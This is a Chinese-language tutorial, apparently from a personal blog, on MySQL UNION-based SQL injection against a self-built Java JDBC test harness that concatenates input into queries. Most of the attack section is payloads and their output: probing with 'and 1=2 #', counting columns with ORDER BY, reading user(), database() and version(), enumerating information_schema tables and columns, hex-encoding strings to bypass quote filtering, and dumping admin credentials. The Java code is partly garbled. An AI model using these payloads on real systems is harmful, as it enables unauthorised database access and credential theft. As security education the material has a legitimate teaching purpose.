以下是mynona本人原创的，奉献给大家，不要小看数据库注入

参考：

必备知识：

mysql的sql注释符号：#

无论mysql还是sqlServer数据库，里面都有information_schema这个数据库，这个数据库里面TABLES表保存了数据库所有表名，COLUMNS表保存了表   的所有字段名，我们暴库就是针对这两个表。

SQL UNION 操作符

UNION 操作符用于合并两个或多个 SELECT 语句的结果集。

请注意，UNION 内部的 SELECT 语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时，每条 SELECT 语句中的列的顺序必须相同。

LIMIT子句

LIMIT 子句用于规定要返回的记录的数目。

对于拥有成千上万条记录的大型表来说，LIMIT 子句是非常有用的。

语法：SELECT 列名称 FROM 表名称 LIMIT 开始位置, 行数

注意：开始位置可以省略，默认是0位置

测试代码：

数据库连接类

(适合mysql和MSSQL２００８)

importjava.sql.Connection;public classDateExecute {privateString user;privateString password;privateString type;privateString databaseName;publicDateExecute(String type, String user, String password, String databaseName){this.type =type;this.user =user;this.password =password;this.databaseName =databaseName;

}publicConnection getConnection()throwsInstantiationException, IllegalAccessException,

ClassNotFoundException, SQLException {

Connection con= null;if(type.equals("mysql")){

String driverName= "com.mysql.jdbc.Driver";

Driver d=(Driver) Class.forName(driverName).newInstance();

con= DriverManager.getConnection("jdbc:mysql://localhost:3306/"+databaseName,

user, password);

}else{

String driverName= "com.microsoft.sqlserver.jdbc.SQLServerDriver";

Driver d=(Driver) Class.forName(driverName).newInstance();

con= DriverManager.getConnection("jdbc:sqlserver://localhost:1433; DatabaseName="+databaseName,

user, password);

}returncon;

}public List>getDateList(String sql)throwsInstantiationException, IllegalAccessException,

ClassNotFoundException, SQLException {

Connection conn=getConnection();

List> list = new ArrayList>();try{//stmt = conn.prepareStatement(sql);//ResultSet rs = stmt.executeQuery(sql);

Statement state =conn.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,ResultSet.CONCUR_READ_ONLY);

ResultSet rs=state.executeQuery(sql);

list=convertList(rs);

}catch(SQLException e) {

System.out.println("数据库连接失败");

e.printStackTrace();

}returnlist;

}private List convertList(ResultSet rs) throwsSQLException {

List list= newArrayList();

ResultSetMetaData md=rs.getMetaData();int columnCount = md.getColumnCount(); //Map rowData;

while (rs.next()) { //rowData = new HashMap(columnCount);

Map rowData = new HashMap();for (int i = 1; i <= columnCount; i++) {

rowData.put(md.getColumnName(i), rs.getObject(i));

}

list.add(rowData);

}returnlist;

}public int executeUpdate(String sql) throwsInstantiationException,

IllegalAccessException, ClassNotFoundException, SQLException {

Connection conn=getConnection();

Statement stmt;int success = 0;try{

stmt=conn.createStatement();

success=stmt.executeUpdate(sql);

}catch(SQLException e) {

System.out.println("数据库连接失败");

e.printStackTrace();

}returnsuccess;

}

}

测试类：

(我们就是在这个类里面构造注入的sql语句)

importjava.sql.SQLException;public classTestSql {public static void main(String[] args) throwsInstantiationException,

IllegalAccessException, ClassNotFoundException, SQLException {//”root”为你mysql用户名，“xxxxx”为密码，“school”为数据库名

DateExecute de = new DateExecute("mysql", "root", "XXXXX","school");//DateExecute de = new DateExecute("mssql", "sa", "abca157992.","school");//MYSQL

String sqlM= "select * from user;";

String sqlInsertM= "insert into user value(24,'mynona','122334')";

String sqlDeleteM= "delete from user where name = 'mynona'";

System.out.println(de.getDateList(sqlbefore+sql));//MSSQL/*String sqlbefore = "select * from student where id = 1 ";

String sql = " and 1=2 union select 1,column_name,3 from information_schema.columns where table_name='student'";

String sqlInsert = "insert into student values(6, 222, 111)";

String sqlDelete = "delete from student where id = 4";*/

//de.executeUpdate(sqlInsert);

}

}

测试数据库：

测试数据：

假设我们的目标是admin这个表，对于user这个表有个注入点:

Select * from user where name = ‘’;

具体如下：

public classTestSql {public static void main(String[] args) throwsInstantiationException,

IllegalAccessException, ClassNotFoundException, SQLException {

DateExecute de= new DateExecute("mysql", "root", "157992","school");

String name= "admin";

String password="mynona";

String sql= "select * from user where name = '" + name +"' and password = '" + password + "'";

System.out.println("执行的sql语句:\n" +sql);

System.out.println(de.getDateList(sql));

}

}

上面那条sql语句明显两个sql注入点，分别是name和password

运行上面的程序，可以正常输出：

[{id=1, name=admin, password=mynona}]

现在我们要针对name这个注入点构造注入的sql语句。

判断注入点：

目标：看看是否有注入

我们令

name ="mynona and 1=1 #";

然后指向上面的测试代码：

执行的sql语句:

select * from user where name = 'mynona' and 1=1 #' and password = 'mynona'

输出结果：

[{id=2, name=mynona, password=122334}]

还是之前的数据，没变化

再令：

name ="mynona and 1=2 #";

执行的sql语句:

select * from user where name = 'mynona' and 1=2 #' and password = 'mynona'

输出结果：

[]

没有数据了，说明有注入

(tip:sql语句中“#”后面的内容会被忽略)

判断字段数(重要)：

目标：看看当前注入点select了几个字段

(知道这些字段数后以后我们做union语句时就等与这相等)

分别构造：

name ="mynona' order by 1 #"; 输出正常

name="mynona' order by 2 #";输出正常

name="mynona' order by 3 #";输出正常

name="mynona' order by 4 #";错误输出

由此可以知道当前的表有3个字段

然后我们联合查询：

name ="mynona' and 1=2 union select 1,2,3 #";

执行的sql语句:

select * from user where name = 'mynona' and 1=2 union select 1,2,3 #' and password = 'mynona'

输出结果：

[{id=1, name=2, password=3}]

查看用户名：

name ="mynona' and 1=2 union select 1,user(),3 #";

执行的sql语句:

select * from user where name = 'mynona' and 1=2 union select 1,user(),3 #' and password = 'mynona'

输出结果：

[{id=1, name=root@localhost, password=3}]

现在用户名出来了，是root

查看数据库：

name ="mynona' and 1=2 union select 1,database(),3 #";

执行的sql语句:

select * from user where name = 'mynona' and 1=2 union select 1,database(),3 #' and password = 'mynona'

输出结果：

[{id=1, name=school, password=3}]

当前数据库名也出来了：school

查看数据库版本：

name ="mynona' and 1=2 union select 1,version(),3 #";

执行的sql语句:

select * from user where name = 'mynona' and 1=2 union select 1,version(),3 #' and password = 'mynona'

输出结果：

[{id=1, name=5.5.34, password=3}]

可以看到mysql版本是5.5.34

开始爆库：

在mysql里有information_schema这个库，这个库里有tables表，表中有table_schema字段，这个字段储存的时mysql里所有的库名，同时还有table_name这个字段，储存的是MySQL里所有的表名。

遍历数据库school里面的所有表：

其实就是差information_schema数据库里面的TABLES表

name ="mynona' union select TABLE_NAME,2,3 from information_schema.tables where table_schema='school'# ";

提示：如果对方网站过滤了单引号的话，可以把字符转为16进制：

如school 的十六进制为：0x7363686F6F6C

那么上面那条语句可以变为：

name ="mynona' union select TABLE_NAME,2,3 from information_schema.tables where table_schema=0x7363686F6F6C# ";

执行的sql语句:

select * from user where name = 'mynona' union select TABLE_NAME,2,3 from information_schema.tables where table_schema=0x7363686F6F6C# ' and password = 'mynona'

输出结果：

[{id=2, name=mynona, password=122334}, {id=admin, name=2, password=3}, {id=user, name=2, password=3}]

可以看到school数据库的表为user, admin

看到这里，应该高兴，因为admin说不定就存储这管理员的用户名和密码

下面我们遍历admin表(其实就跟上面遍历user表差不多)

其实就是查询数据库information_schema表里面的COLUMNS表

name ="mynona' union select 1,2,COLUMN_NAME from information_schema.`COLUMNS` where TABLE_NAME = 'admin'# ";

执行的sql语句:

select * from user where name = 'mynona' union select 1,2,COLUMN_NAME from information_schema.`COLUMNS` where TABLE_NAME = 'admin'# ' and password = 'mynona'

输出结果：

[{id=2, name=mynona, password=122334}, {id=1, name=2, password=id}, {id=1, name=2, password=name}, {id=1, name=2, password=phone}, {id=1, name=2, password=sex}, {id=1, name=2, password=tel}, {id=1, name=2, password=password}]

可以看到遍历出了表admin的字段为：id,name,phone,sex,tel,password

遍历name和password字段的数据：

name ="mynona' union select 1,concat(name),concat(password) from admin # ";

执行的sql语句:

select * from user where name = 'mynona' union select 1,concat(name),concat(password) from admin # ' and password = 'mynona'

输出结果：

[{id=2, name=mynona, password=122334}, {id=1, name=admin, password=mynona}]

得出：name=admin,password= mynona

就这样admin表遍历出来了